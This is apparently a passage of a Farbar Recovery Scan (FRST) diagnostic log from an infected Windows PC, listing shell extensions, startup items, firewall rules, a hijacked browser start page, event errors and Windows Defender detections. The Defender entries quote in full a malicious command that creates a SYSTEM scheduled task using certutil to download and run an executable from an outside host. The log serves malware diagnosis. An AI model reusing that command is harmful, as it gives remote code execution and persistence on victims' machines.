Microsoft Advertising SDK for XAML -> C:\Program Files\WindowsApps\Microsoft.Advertising.Xaml_10.1811.1.0_x86__8wekyb3d8bbwe [2019-11-05] (Microsoft Corporation) [MS Ad]
Microsoft Mahjong -> C:\Program Files\WindowsApps\Microsoft.MicrosoftMahjong_3.11.6020.0_x86__8wekyb3d8bbwe [2020-06-09] (Microsoft Studios) [MS Ad]
Microsoft Solitaire Collection -> C:\Program Files\WindowsApps\Microsoft.MicrosoftSolitaireCollection_4.7.8101.0_x86__8wekyb3d8bbwe [2020-09-06] (Microsoft Studios) [MS Ad]
UnRar Metro -> C:\Program Files\WindowsApps\1253QUANTUMVM.UNRARMETRO_14.5.0.0_x86__ckbnxvahp5f44 [2020-06-12] (QuantumVM)
==================== Custom CLSID (Whitelisted): ==============
(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)
CustomCLSID: HKU\S-1-5-21-3093974370-3673700369-3101221773-1002_Classes\CLSID\{1BF42E4C-4AF4-4CFD-A1A0-CF2960B8F63E}\InprocServer32 -> C:\Users\42072\AppData\Local\Microsoft\OneDrive\19.232.1124.0010\FileSyncShell.dll => No File
CustomCLSID: HKU\S-1-5-21-3093974370-3673700369-3101221773-1002_Classes\CLSID\{7AFDFDDB-F914-11E4-8377-6C3BE50D980C}\InprocServer32 -> C:\Users\42072\AppData\Local\Microsoft\OneDrive\19.232.1124.0010\FileSyncShell.dll => No File
CustomCLSID: HKU\S-1-5-21-3093974370-3673700369-3101221773-1002_Classes\CLSID\{82CA8DE3-01AD-4CEA-9D75-BE4C51810A9E}\InprocServer32 -> C:\Users\42072\AppData\Local\Microsoft\OneDrive\19.232.1124.0010\FileSyncShell.dll => No File
CustomCLSID: HKU\S-1-5-21-3093974370-3673700369-3101221773-1002_Classes\CLSID\{E7629152-0A34-4487-B787-5D1144304455}\localserver32 -> no filepath
ShellIconOverlayIdentifiers: [ OneDrive1] -> {BBACC218-34EA-4666-9D7A-C78F2274A524} => -> No File
ShellIconOverlayIdentifiers: [ OneDrive2] -> {5AB7172C-9C11-405C-8DD5-AF20F3606282} => -> No File
ShellIconOverlayIdentifiers: [ OneDrive3] -> {A78ED123-AB77-406B-9962-2A5D9D2F7F30} => -> No File
ShellIconOverlayIdentifiers: [ OneDrive4] -> {F241C880-6982-4CE5-8CF7-7085BA96DA5A} => -> No File
ShellIconOverlayIdentifiers: [ OneDrive5] -> {A0396A93-DC06-4AEF-BEE9-95FFCCAEF20E} => -> No File
ShellIconOverlayIdentifiers: [ OneDrive6] -> {9AA2F32D-362A-42D9-9328-24A483E2CCC3} => -> No File
ShellIconOverlayIdentifiers: [ OneDrive7] -> {C5FF006E-2AE9-408C-B85B-2DFDD5449D9C} => -> No File
ContextMenuHandlers1: [ESET Security Shell] -> {B089FE88-FB52-11D3-BDF1-0050DA34150D} => C:\Program Files\ESET\ESET Security\shellExt.dll -> No File
ContextMenuHandlers1: [ReflectShellExt] -> {DEBB9B79-B3DD-47F4-9E5C-EA6975BAB611} => C:\Program Files\Macrium\Reflect\RContextMenu.dll [2019-09-20] (Paramount Software UK Ltd -> Paramount Software UK Ltd)
ContextMenuHandlers1: [WinRAR] -> {B41DB860-8EE4-11D2-9906-E49FADC173CA} => C:\Program Files\WinRAR\rarext.dll [2020-03-09] (win.rar GmbH -> Alexander Roshal)
ContextMenuHandlers2: [DaemonShellExtDriveLite] -> {C06369D6-E77D-4626-9656-1256312BD576} => C:\Program Files\DAEMON Tools Lite\dtshl32.dll [2020-03-19] (AVB Disc Soft, SIA -> Disc Soft Ltd)
ContextMenuHandlers2: [ESET Security Shell] -> {B089FE88-FB52-11D3-BDF1-0050DA34150D} => C:\Program Files\ESET\ESET Security\shellExt.dll -> No File
ContextMenuHandlers2: [ReflectShellExt] -> {DEBB9B79-B3DD-47F4-9E5C-EA6975BAB611} => C:\Program Files\Macrium\Reflect\RContextMenu.dll [2019-09-20] (Paramount Software UK Ltd -> Paramount Software UK Ltd)
ContextMenuHandlers3: [DaemonShellExtImageLite] -> {1D1B5D7B-0FC9-452E-902C-12BACD4FBC20} => C:\Program Files\DAEMON Tools Lite\dtshl32.dll [2020-03-19] (AVB Disc Soft, SIA -> Disc Soft Ltd)
ContextMenuHandlers5: [ACE] -> {5E2121EE-0300-11D4-8D3B-444553540000} => C:\Program Files\ATI Technologies\ATI.ACE\Core-Static\atiacmxx.dll [2015-11-04] (Advanced Micro Devices, Inc. -> Advanced Micro Devices, Inc.)
ContextMenuHandlers6: [ESET Security Shell] -> {B089FE88-FB52-11D3-BDF1-0050DA34150D} => C:\Program Files\ESET\ESET Security\shellExt.dll -> No File
ContextMenuHandlers6: [WinRAR] -> {B41DB860-8EE4-11D2-9906-E49FADC173CA} => C:\Program Files\WinRAR\rarext.dll [2020-03-09] (win.rar GmbH -> Alexander Roshal)
==================== Codecs (Whitelisted) ====================
(If an entry is included in the fixlist, the registry item will be restored to default or removed. The file will not be moved.)
HKLM\...\Drivers32: [VIDC.FPS1] => C:\WINDOWS\system32\frapsvid.dll [94208 2019-08-30] (Beepa P/L) [File not signed]
==================== Shortcuts & WMI ========================
(The entries could be listed to be restored or removed.)
ShortcutWithArgument: C:\Users\42072\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\WarThunder\WarThunder.lnk -> C:\Program Files\Internet Explorer\iexplore.exe (Microsoft Corporation) -> hxxp://go.playmmogames.com/aff_c?offer_id=698&aff_id=1034&source=3&aff_sub2=WGcGZy4UcmYtFXMUWmcHZkRjAEcKNQITUDYAHFExDglaZAMcRGfipJgAAAGhXNyUie&click_id=f306cd3d4dae7747931f684cc695e9d8357f3ee3
ShortcutWithArgument: C:\Users\42072\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\WarThunder.lnk -> C:\Program Files\Internet Explorer\iexplore.exe (Microsoft Corporation) -> hxxp://go.playmmogames.com/aff_c?offer_id=698&aff_id=1034&source=3&aff_sub2=WGcGZy4UcmYtFXMUWmcHZkRjAEcKNQITUDYAHFExDglaZAMcRGfipJgAAAGhXNyUie&click_id=f306cd3d4dae7747931f684cc695e9d8357f3ee3
==================== Loaded Modules (Whitelisted) =============
==================== Alternate Data Streams (Whitelisted) ========
(If an entry is included in the fixlist, only the ADS will be removed.)
AlternateDataStreams: C:\Users\42072:.repos [616623]
==================== Safe Mode (Whitelisted) ==================
(If an entry is included in the fixlist, it will be removed from the registry. The "AlternateShell" value will be restored.)
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Option => "OptionValue"="1"
==================== Association (Whitelisted) =================
==================== Internet Explorer (Whitelisted) ==========
HKU\S-1-5-21-3093974370-3673700369-3101221773-1002\Software\Microsoft\Internet Explorer\Main,Start Page = hxxps://securesearch.org/homepage?hp=2&pId=BC180101&iDate=2020-09-11 04:31:44&bName=
SearchScopes: HKU\S-1-5-21-3093974370-3673700369-3101221773-1002 -> {993F5746-4C15-42BC-99C1-064A1764271B} URL = hxxps://securesearch.org?q={searchTerms}
BHO: Skype for Business Browser Helper -> {31D09BA0-12F5-4CCE-BE8A-2923E76605DA} -> C:\Program Files\Microsoft Office\Office16\OCHelper.dll [2015-07-31] (Microsoft Corporation -> Microsoft Corporation)
BHO: Java(tm) Plug-In SSV Helper -> {761497BB-D6F0-462C-B6EB-D4DAF1D92D43} -> C:\Program Files\Java\jre1.8.0_261\bin\ssv.dll [2020-10-10] (Oracle America, Inc. -> Oracle Corporation)
BHO: Microsoft OneDrive for Business Browser Helper -> {D0498E0A-45B7-42AE-A9AA-ABA463DBD3BF} -> C:\Program Files\Microsoft Office\Office16\GROOVEEX.DLL [2015-07-31] (Microsoft Corporation -> Microsoft Corporation)
BHO: Java(tm) Plug-In 2 SSV Helper -> {DBC80044-A445-435b-BC74-9C25C1C588A9} -> C:\Program Files\Java\jre1.8.0_261\bin\jp2ssv.dll [2020-10-10] (Oracle America, Inc. -> Oracle Corporation)
Handler: mso-minsb.16 - {3459B272-CC19-4448-86C9-DDC3B4B2FAD3} - C:\Program Files\Microsoft Office\Office16\MSOSB.DLL [2015-07-31] (Microsoft Corporation -> Microsoft Corporation)
Handler: osf.16 - {5504BE45-A83B-4808-900A-3A5C36E7F77A} - C:\Program Files\Microsoft Office\Office16\MSOSB.DLL [2015-07-31] (Microsoft Corporation -> Microsoft Corporation)
(If an entry is included in the fixlist, it will be removed from the registry.)
IE trusted site: HKU\.DEFAULT\...\localhost -> localhost
IE trusted site: HKU\.DEFAULT\...\webcompanion.com -> hxxp://webcompanion.com
IE trusted site: HKU\S-1-5-21-3093974370-3673700369-3101221773-1002\...\localhost -> localhost
IE trusted site: HKU\S-1-5-21-3093974370-3673700369-3101221773-1002\...\webcompanion.com -> hxxp://webcompanion.com
==================== Hosts content: =========================
(If needed Hosts: directive could be included in the fixlist to reset Hosts.)
2019-03-19 04:43 - 2020-09-12 18:14 - 000000824 _____ C:\WINDOWS\system32\drivers\etc\hosts
==================== Other Areas ===========================
(Currently there is no automatic fix for this section.)
HKLM\System\CurrentControlSet\Control\Session Manager\Environment\\Path -> C:\Program Files\Common Files\Oracle\Java\javapath;%SystemRoot%\system32;%SystemRoot%;%SystemRoot%\System32\Wbem;%SYSTEMROOT%\System32\WindowsPowerShell\v1.0\;%SYSTEMROOT%\System32\OpenSSH\;C:\Program Files\ATI Technologies\ATI.ACE\Core-Static
HKU\S-1-5-21-3093974370-3673700369-3101221773-1002\Control Panel\Desktop\\Wallpaper -> C:\Users\42072\AppData\Local\Packages\Microsoft.Windows.Photos_8wekyb3d8bbwe\LocalState\PhotosAppBackground\103122316 (2).jpg
DNS Servers: Media is not connected to internet.
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System => (ConsentPromptBehaviorAdmin: 5) (ConsentPromptBehaviorUser: 3) (EnableLUA: 1)
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer => (SmartScreenEnabled: )
==================== MSCONFIG/TASK MANAGER disabled items ==
(If an entry is included in the fixlist, it will be removed.)
HKLM\...\StartupApproved\Run: => "seznam-listicka-distribuce"
HKLM\...\StartupApproved\Run: => "Launch LCore"
HKU\S-1-5-21-3093974370-3673700369-3101221773-1002\...\StartupApproved\Run: => "Spotify"
HKU\S-1-5-21-3093974370-3673700369-3101221773-1002\...\StartupApproved\Run: => "DAEMON Tools Lite Automount"
HKU\S-1-5-21-3093974370-3673700369-3101221773-1002\...\StartupApproved\Run: => "EpicGamesLauncher"
HKU\S-1-5-21-3093974370-3673700369-3101221773-1002\...\StartupApproved\Run: => "rfxgnkvq"
HKU\S-1-5-21-3093974370-3673700369-3101221773-1002\...\StartupApproved\Run: => "CloudNet"
HKU\S-1-5-21-3093974370-3673700369-3101221773-1002\...\StartupApproved\Run: => "Web Companion"
HKU\S-1-5-21-3093974370-3673700369-3101221773-1002\...\StartupApproved\Run: => "Mobigame Playstore"
==================== FirewallRules (Whitelisted) ================
(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)
FirewallRules: [UDP Query User{84300298-B7CB-433F-910C-B145F679ED07}C:\users\42072\.lunarclient\offline\jre\jre1.8.0_131\bin\javaw.exe] => (Block) C:\users\42072\.lunarclient\offline\jre\jre1.8.0_131\bin\javaw.exe
FirewallRules: [TCP Query User{019068A6-6063-42C6-856F-7D4F25FD45F9}C:\users\42072\.lunarclient\offline\jre\jre1.8.0_131\bin\javaw.exe] => (Block) C:\users\42072\.lunarclient\offline\jre\jre1.8.0_131\bin\javaw.exe
FirewallRules: [UDP Query User{8D828ACF-4AEA-44C5-A1F6-B4490594C84C}C:\program files\logitech gaming software\lcore.exe] => (Allow) C:\program files\logitech gaming software\lcore.exe (Logitech Inc -> Logitech Inc.)
FirewallRules: [TCP Query User{5FE5D572-B26D-4CAE-AC2E-D12DB7450D50}C:\program files\logitech gaming software\lcore.exe] => (Allow) C:\program files\logitech gaming software\lcore.exe (Logitech Inc -> Logitech Inc.)
FirewallRules: [{562DE85C-29FE-45F0-AEF0-B6B7F1FA157C}] => (Allow) C:\ProgramData\Logishrd\LogiOptions\Software\Current\LogiOptionsMgr.EXE (Logitech Inc -> Logitech, Inc.)
FirewallRules: [UDP Query User{B25BFF2E-534B-4514-B181-D007490F890E}C:\program files\mozilla firefox\firefox.exe] => (Block) C:\program files\mozilla firefox\firefox.exe (Mozilla Corporation -> Mozilla Corporation)
FirewallRules: [TCP Query User{320FCA28-90D8-46D0-A192-3787C2D30DA8}C:\program files\mozilla firefox\firefox.exe] => (Block) C:\program files\mozilla firefox\firefox.exe (Mozilla Corporation -> Mozilla Corporation)
FirewallRules: [{FD11177B-E329-4F0A-AB7C-A7902F91FD7D}] => (Allow) C:\Program Files\Microsoft Office\Office16\UcMapi.exe (Microsoft Corporation -> Microsoft Corporation)
FirewallRules: [{DB43DC0B-5959-4385-8DA3-184F468ABCBD}] => (Allow) C:\Program Files\Microsoft Office\Office16\UcMapi.exe (Microsoft Corporation -> Microsoft Corporation)
FirewallRules: [{64E88E64-8F50-4D8E-AE6C-A49D73EE61AC}] => (Allow) C:\Program Files\Microsoft Office\Office16\lync.exe (Microsoft Corporation -> Microsoft Corporation)
FirewallRules: [{00A8BACB-445A-464B-9377-5E105021126D}] => (Allow) C:\Program Files\Microsoft Office\Office16\lync.exe (Microsoft Corporation -> Microsoft Corporation)
FirewallRules: [UDP Query User{2E007B32-DF29-4372-BAD7-4AF580BCCD5E}C:\programdata\badlionclient\jre\bin\javaw.exe] => (Allow) C:\programdata\badlionclient\jre\bin\javaw.exe
FirewallRules: [TCP Query User{0B9FD880-9293-4C01-912A-9425048B8CA0}C:\programdata\badlionclient\jre\bin\javaw.exe] => (Allow) C:\programdata\badlionclient\jre\bin\javaw.exe
FirewallRules: [{A3C4A266-B549-4CDD-9FD9-8CBB97C57BF0}] => (Allow) C:\Program Files\DAEMON Tools Lite\DiscSoftBusServiceLite.exe (AVB Disc Soft, SIA -> Disc Soft Ltd)
FirewallRules: [{3EAB28E6-A364-4882-8481-895A574BF274}] => (Allow) C:\Program Files\DAEMON Tools Lite\DiscSoftBusServiceLite.exe (AVB Disc Soft, SIA -> Disc Soft Ltd)
FirewallRules: [UDP Query User{EAB50D73-12CA-4F3B-87F3-554786A108B0}C:\program files\duke nukem - manhattan project\prism3d.exe] => (Block) C:\program files\duke nukem - manhattan project\prism3d.exe () [File not signed]
FirewallRules: [TCP Query User{5DBABCD5-4461-4ADE-B726-1526E5409DA3}C:\program files\duke nukem - manhattan project\prism3d.exe] => (Block) C:\program files\duke nukem - manhattan project\prism3d.exe () [File not signed]
FirewallRules: [UDP Query User{58A80BB9-3D27-47F4-AF59-9C11F11B08C1}C:\program files\valve\half-life\hl.exe] => (Block) C:\program files\valve\half-life\hl.exe => No File
FirewallRules: [TCP Query User{67D1C637-5380-48E9-86BE-42E95B7CA25E}C:\program files\valve\half-life\hl.exe] => (Block) C:\program files\valve\half-life\hl.exe => No File
FirewallRules: [UDP Query User{15D6B20B-C526-4084-8018-D2BDB13DC0A7}C:\users\42072\appdata\roaming\utorrent\utorrent.exe] => (Block) C:\users\42072\appdata\roaming\utorrent\utorrent.exe (uTorrent.CZ -> BitTorrent, Inc.) [File not signed]
FirewallRules: [TCP Query User{71C01058-FA98-4143-BD85-58F8754636AD}C:\users\42072\appdata\roaming\utorrent\utorrent.exe] => (Block) C:\users\42072\appdata\roaming\utorrent\utorrent.exe (uTorrent.CZ -> BitTorrent, Inc.) [File not signed]
FirewallRules: [UDP Query User{D37B3EDE-1653-4473-9978-72B09F481D20}C:\users\42072\appdata\roaming\spotify\spotify.exe] => (Block) C:\users\42072\appdata\roaming\spotify\spotify.exe (Spotify AB -> Spotify Ltd)
FirewallRules: [TCP Query User{7A8ED71F-1BD3-4647-B441-FDBE38F625C8}C:\users\42072\appdata\roaming\spotify\spotify.exe] => (Block) C:\users\42072\appdata\roaming\spotify\spotify.exe (Spotify AB -> Spotify Ltd)
FirewallRules: [UDP Query User{551B3597-06A3-471D-9767-EFE87BC8B93C}C:\program files\minecraft launcher\runtime\jre-x86\bin\javaw.exe] => (Block) C:\program files\minecraft launcher\runtime\jre-x86\bin\javaw.exe
FirewallRules: [TCP Query User{F32A8597-1895-4920-BEBF-8B41E9DC6198}C:\program files\minecraft launcher\runtime\jre-x86\bin\javaw.exe] => (Block) C:\program files\minecraft launcher\runtime\jre-x86\bin\javaw.exe
FirewallRules: [{C04E4B27-1BB9-4D05-B483-6B9D3B7A6E43}] => (Allow) C:\Program Files\Mozilla Firefox\firefox.exe (Mozilla Corporation -> Mozilla Corporation)
FirewallRules: [{6508FEBA-543A-49C7-8328-EB56538D3FDF}] => (Allow) C:\Program Files\WindowsApps\Microsoft.SkypeApp_15.63.76.0_x86__kzf8qxf38zg5c\Skype\Skype.exe (Skype Software Sarl -> Skype Technologies S.A.)
FirewallRules: [{E4093EED-CD4A-4AC1-B72D-97A4BEF6A8D4}] => (Allow) C:\Program Files\WindowsApps\Microsoft.SkypeApp_15.63.76.0_x86__kzf8qxf38zg5c\Skype\Skype.exe (Skype Software Sarl -> Skype Technologies S.A.)
FirewallRules: [{6F6B4D3D-DC59-4970-A54A-417118EFBC88}] => (Allow) C:\Program Files\WindowsApps\Microsoft.SkypeApp_15.63.76.0_x86__kzf8qxf38zg5c\Skype\Skype.exe (Skype Software Sarl -> Skype Technologies S.A.)
FirewallRules: [{B1B1EA4E-71ED-4AA2-A771-6C1B62B2246F}] => (Allow) C:\Program Files\WindowsApps\Microsoft.SkypeApp_15.63.76.0_x86__kzf8qxf38zg5c\Skype\Skype.exe (Skype Software Sarl -> Skype Technologies S.A.)
FirewallRules: [{D2097B25-660C-449A-9396-AF97B8F5BBD1}] => (Allow) C:\Program Files\MobiGame\player\mobiplayer.exe (Game Player) [File not signed]
FirewallRules: [{F3CDFAC5-A975-48F4-9DAB-369F7F2E4853}] => (Allow) C:\Program Files\MobiGame\vbox\vboxheadless.exe (Iron Entertainment Inc. -> Oracle Corporation)
FirewallRules: [{93C34D1D-8364-41F3-844F-1694693AB6AF}] => (Allow) C:\Users\42072\AppData\Roaming\16f618eaf6a0\16f618eaf6a0.exe () [File not signed]
FirewallRules: [{96DC6731-E2CF-4F11-BC78-0A40F04761A0}] => (Allow) C:\WINDOWS\rss\csrss.exe () [File not signed]
FirewallRules: [{103F7BC9-F0D2-47F2-AE12-488E8CCB3AE5}] => (Allow) C:\Program Files\Google\Chrome\Application\chrome.exe (Google LLC -> Google LLC)
FirewallRules: [{E51FC64F-7EDE-49D5-A7D8-3BAEFD4D43A5}] => (Allow) C:\Program Files\Steam\Steam.exe (Valve -> Valve Corporation)
FirewallRules: [{2E0F18A4-8866-418B-A129-0E740AFCB831}] => (Allow) C:\Program Files\Steam\Steam.exe (Valve -> Valve Corporation)
FirewallRules: [{A1A1877F-2977-4C42-BC94-5733B7BC5052}] => (Allow) C:\Program Files\Steam\bin\cef\cef.win7\steamwebhelper.exe (Valve -> Valve Corporation)
FirewallRules: [{C57B14A1-38E9-4505-B515-CF973F43D220}] => (Allow) C:\Program Files\Steam\bin\cef\cef.win7\steamwebhelper.exe (Valve -> Valve Corporation)
FirewallRules: [{7A5BBB51-4EC6-4223-9825-D742308E06AC}] => (Allow) C:\Program Files\Steam\steamapps\common\SMITE\Binaries\Win32\SmiteEAC.exe (EasyAntiCheat Oy -> EasyAntiCheat Ltd)
FirewallRules: [{17AB0CF4-6BF5-4355-855D-FD1B1B3F4558}] => (Allow) C:\Program Files\Steam\steamapps\common\SMITE\Binaries\Win32\SmiteEAC.exe (EasyAntiCheat Oy -> EasyAntiCheat Ltd)
FirewallRules: [TCP Query User{B77DDFF5-FD77-4EDA-997E-E38211DFD8B7}C:\program files\steam\steamapps\common\smite\binaries\win32\smite.exe] => (Allow) C:\program files\steam\steamapps\common\smite\binaries\win32\smite.exe (Hi-Rez Studios, Inc. -> Hirez Studios, Inc.)
FirewallRules: [UDP Query User{42D3A007-3F32-4A37-BFAE-2BEA8902C5D4}C:\program files\steam\steamapps\common\smite\binaries\win32\smite.exe] => (Allow) C:\program files\steam\steamapps\common\smite\binaries\win32\smite.exe (Hi-Rez Studios, Inc. -> Hirez Studios, Inc.)
FirewallRules: [{32366988-A515-41D3-B0D4-41DED8B526DC}] => (Allow) C:\Program Files\Steam\steamapps\common\smite pt\Binaries\Win32\SmiteEAC.exe (EasyAntiCheat Oy -> EasyAntiCheat Ltd)
FirewallRules: [{EEEA3F19-1A43-4849-9875-7F01013DC70A}] => (Allow) C:\Program Files\Steam\steamapps\common\smite pt\Binaries\Win32\SmiteEAC.exe (EasyAntiCheat Oy -> EasyAntiCheat Ltd)
FirewallRules: [TCP Query User{D44B9937-30AF-4D9B-B4E1-A31DA800E4C4}C:\program files\steam\steamapps\common\smite pt\binaries\win32\smite.exe] => (Allow) C:\program files\steam\steamapps\common\smite pt\binaries\win32\smite.exe (Hi-Rez Studios, Inc. -> Hirez Studios, Inc.)
FirewallRules: [UDP Query User{0BBCD1EB-1959-44E7-AEF1-C028B8F6D5DE}C:\program files\steam\steamapps\common\smite pt\binaries\win32\smite.exe] => (Allow) C:\program files\steam\steamapps\common\smite pt\binaries\win32\smite.exe (Hi-Rez Studios, Inc. -> Hirez Studios, Inc.)
==================== Restore Points =========================
03-09-2020 09:10:42 Windows Modules Installer
==================== Faulty Device Manager Devices ============
Name:
Description:
Class Guid:
Manufacturer:
Service:
Problem: : The drivers for this device are not installed. (Code 28)
Resolution: To install the drivers for this device, click "Update Driver", which starts the Hardware Update wizard.
Name: Standard PS/2 Keyboard
Description: Standard PS/2 Keyboard
Class Guid: {4d36e96b-e325-11ce-bfc1-08002be10318}
Manufacturer: (Standard keyboards)
Service: i8042prt
Problem: : This device is not present, is not working properly, or does not have all its drivers installed. (Code 24)
Resolution: The device is installed incorrectly. The problem could be a hardware failure, or a new driver might be needed.
Devices stay in this state if they have been prepared for removal.
After you remove the device, this error disappears. Remove the device, and this error should be resolved.
==================== Event log errors: ========================
Application errors:
==================
Error: (10/20/2020 09:17:18 PM) (Source: VSS) (EventID: 13) (User: )
Description: Volume Shadow Copy Service information: The COM Server with CLSID {4e14fba2-2e22-11d1-9964-00c04fbbb345} and name CEventSystem cannot be started. [0x8007045b, A system shutdown is in progress.]
Error: (10/20/2020 09:15:38 PM) (Source: ESENT) (EventID: 447) (User: )
Description: svchost (6664,D,29) SRUJet: A bad page link (error -338) has been detected in a B-Tree (ObjectId: 21, PgnoRoot: 95) of database C:\WINDOWS\system32\SRU\SRUDB.dat (671 => 3078, 21).
Tag: BtDownClinesLowEmpty
Fatal: 1
Error: (10/20/2020 09:15:15 PM) (Source: ESENT) (EventID: 481) (User: )
Description: taskhostw (11060,G,0) An attempt to read from the file C:\Users\42072\AppData\Local\Microsoft\Windows\WebCache\WebCacheV01.dat at offset 65536 (0x0000000000010000) for 65536 (0x00010000) bytes failed after 0.000 seconds with system error 5 (0x00000005): Access is denied. The read operation will fail with error -1032 (0xfffffbf8). If this error persists then the file may be damaged and may need to be restored from a previous backup.
Error: (10/20/2020 09:15:15 PM) (Source: ESENT) (EventID: 481) (User: )
Description: taskhostw (11060,G,0) An attempt to read from the file C:\Users\42072\AppData\Local\Microsoft\Windows\WebCache\WebCacheV01.dat at offset 0 (0x0000000000000000) for 65536 (0x00010000) bytes failed after 0.000 seconds with system error 5 (0x00000005): Access is denied. The read operation will fail with error -1032 (0xfffffbf8). If this error persists then the file may be damaged and may need to be restored from a previous backup.
Error: (10/20/2020 09:15:15 PM) (Source: ESENT) (EventID: 481) (User: )
Description: taskhostw (11060,G,0) An attempt to read from the file C:\Users\42072\AppData\Local\Microsoft\Windows\WebCache\WebCacheV01.dat at offset 32768 (0x0000000000008000) for 32768 (0x00008000) bytes failed after 0.000 seconds with system error 5 (0x00000005): Access is denied. The read operation will fail with error -1032 (0xfffffbf8). If this error persists then the file may be damaged and may need to be restored from a previous backup.
Error: (10/20/2020 09:15:15 PM) (Source: ESENT) (EventID: 481) (User: )
Description: taskhostw (11060,G,0) An attempt to read from the file C:\Users\42072\AppData\Local\Microsoft\Windows\WebCache\WebCacheV01.dat at offset 0 (0x0000000000000000) for 32768 (0x00008000) bytes failed after 0.000 seconds with system error 5 (0x00000005): Access is denied. The read operation will fail with error -1032 (0xfffffbf8). If this error persists then the file may be damaged and may need to be restored from a previous backup.
Error: (10/20/2020 09:15:15 PM) (Source: ESENT) (EventID: 481) (User: )
Description: taskhostw (11060,G,0) An attempt to read from the file C:\Users\42072\AppData\Local\Microsoft\Windows\WebCache\WebCacheV01.dat at offset 16384 (0x0000000000004000) for 16384 (0x00004000) bytes failed after 0.000 seconds with system error 5 (0x00000005): Access is denied. The read operation will fail with error -1032 (0xfffffbf8). If this error persists then the file may be damaged and may need to be restored from a previous backup.
Error: (10/20/2020 09:15:15 PM) (Source: ESENT) (EventID: 481) (User: )
Description: taskhostw (11060,G,0) An attempt to read from the file C:\Users\42072\AppData\Local\Microsoft\Windows\WebCache\WebCacheV01.dat at offset 0 (0x0000000000000000) for 16384 (0x00004000) bytes failed after 0.000 seconds with system error 5 (0x00000005): Access is denied. The read operation will fail with error -1032 (0xfffffbf8). If this error persists then the file may be damaged and may need to be restored from a previous backup.
System errors:
=============
Error: (10/20/2020 10:10:00 PM) (Source: DCOM) (EventID: 10005) (User: DESKTOP-4NQUTUE)
Description: DCOM got error 1084 attempting to start the service ShellHWDetection with arguments "Unavailable" in order to run the server:
{DD522ACC-F821-461A-A407-50B198B896DC}
Error: (10/20/2020 10:09:19 PM) (Source: DCOM) (EventID: 10005) (User: DESKTOP-4NQUTUE)
Description: DCOM got error 1084 attempting to start the service ShellHWDetection with arguments "Unavailable" in order to run the server:
{DD522ACC-F821-461A-A407-50B198B896DC}
Error: (10/20/2020 10:08:52 PM) (Source: DCOM) (EventID: 10005) (User: DESKTOP-4NQUTUE)
Description: DCOM got error 1084 attempting to start the service WSearch with arguments "Unavailable" in order to run the server:
{9E175B6D-F52A-11D8-B9A5-505054503030}
Error: (10/20/2020 10:08:52 PM) (Source: DCOM) (EventID: 10005) (User: DESKTOP-4NQUTUE)
Description: DCOM got error 1084 attempting to start the service VSS with arguments "Unavailable" in order to run the server:
{E579AB5F-1CC4-44B4-BED9-DE0991FF0623}
Error: (10/20/2020 10:08:52 PM) (Source: DCOM) (EventID: 10005) (User: DESKTOP-4NQUTUE)
Description: DCOM got error 1084 attempting to start the service VSS with arguments "Unavailable" in order to run the server:
{E579AB5F-1CC4-44B4-BED9-DE0991FF0623}
Error: (10/20/2020 10:08:52 PM) (Source: DCOM) (EventID: 10005) (User: DESKTOP-4NQUTUE)
Description: DCOM got error 1084 attempting to start the service VSS with arguments "Unavailable" in order to run the server:
{E579AB5F-1CC4-44B4-BED9-DE0991FF0623}
Error: (10/20/2020 10:08:50 PM) (Source: DCOM) (EventID: 10005) (User: DESKTOP-4NQUTUE)
Description: DCOM got error 1084 attempting to start the service ShellHWDetection with arguments "Unavailable" in order to run the server:
{DD522ACC-F821-461A-A407-50B198B896DC}
Error: (10/20/2020 10:08:35 PM) (Source: DCOM) (EventID: 10005) (User: DESKTOP-4NQUTUE)
Description: DCOM got error 1084 attempting to start the service ShellHWDetection with arguments "Unavailable" in order to run the server:
{DD522ACC-F821-461A-A407-50B198B896DC}
Windows Defender:
===================================
Date: 2020-10-20 21:18:45.1140000Z
Description:
Microsoft Defender Antivirus has detected malware or other potentially unwanted software.
For more information please see the following:
https://go.microsoft.com/fwlink/?linkid ... terprise=0
Name: Trojan:Win32/Ceprolad.A
ID: 2147726914
Severity: Severe
Category: Trojan
Path: CmdLine:_C:\Windows\System32\schtasks.exe /CREATE /SC ONLOGON /RL HIGHEST /RU SYSTEM /TR cmd.exe /C certutil.exe -urlcache -split -f https://babsitef.com/app/app.exe C:\Users\42072\AppData\Local\Temp\csrss\scheduled.exe && C:\Users\42072\AppData\Local\Temp\csrss\scheduled.exe /31340 /TN ScheduledUpdate /F
Detection Origin: Unknown
Detection Type: Concrete
Detection Source: System
User: NT AUTHORITY\SYSTEM
Process Name: Unknown
Security intelligence Version: AV: 1.325.1105.0, AS: 1.325.1105.0, NIS: 1.325.1105.0
Engine Version: AM: 1.1.17500.4, NIS: 1.1.17500.4
Date: 2020-10-20 16:56:36.4060000Z
Description:
Microsoft Defender Antivirus has detected malware or other potentially unwanted software.
For more information please see the following:
https://go.microsoft.com/fwlink/?linkid ... terprise=0
Name: Trojan:Win32/Ceprolad.A
ID: 2147726914
Severity: Severe
Category: Trojan
Path: CmdLine:_C:\Windows\System32\schtasks.exe /CREATE /SC ONLOGON /RL HIGHEST /RU SYSTEM /TR cmd.exe /C certutil.exe -urlcache -split -f https://babsitef.com/app/app.exe C:\Users\42072\AppData\Local\Temp\csrss\scheduled.exe && C:\Users\42072\AppData\Local\Temp\csrss\scheduled.exe /31340 /TN ScheduledUpdate /F
Detection Origin: Unknown
Detection Type: Concrete
Detection Source: System
User: NT AUTHORITY\SYSTEM
Process Name: Unknown
Security intelligence Version: AV: 1.325.1105.0, AS: 1.325.1105.0, NIS: 1.325.1105.0
Engine Version: AM: 1.1.17500.4, NIS: 1.1.17500.4
Date: 2020-10-20 16:53:27.5720000Z
Description:
Microsoft Defender Antivirus has detected malware or other potentially unwanted software.
For more information please see the following:
https://go.microsoft.com/fwlink/?linkid ... terprise=0
Name: Trojan:Win32/Ceprolad.A
ID: 2147726914
Severity: Severe
Category: Trojan
